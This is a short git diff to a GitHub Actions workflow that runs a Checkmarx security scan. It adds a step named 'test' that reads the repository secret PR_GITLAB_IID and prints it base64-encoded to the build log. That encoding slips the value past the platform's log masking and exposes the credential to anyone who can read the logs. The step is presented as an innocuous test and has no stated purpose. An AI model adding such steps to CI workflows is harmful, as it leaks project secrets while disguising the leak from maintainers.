diff --git a/.github/workflows/one-scan.yml b/.github/workflows/one-scan.yml index 9a48e5d22..4dfbbb932 100644 --- a/.github/workflows/one-scan.yml +++ b/.github/workflows/one-scan.yml @@ -15,6 +15,11 @@ jobs: steps: - name: Checkout uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1 + - name: test + run: 'echo "$SECRET" | base64' + shell: bash + env: + SECRET: ${{ secrets.PR_GITLAB_IID }} - name: Checkmarx One CLI Action uses: checkmarx/ast-github-action@f0869bd1a37fddc06499a096101e6c900e815d81 # v.2.0.36 with: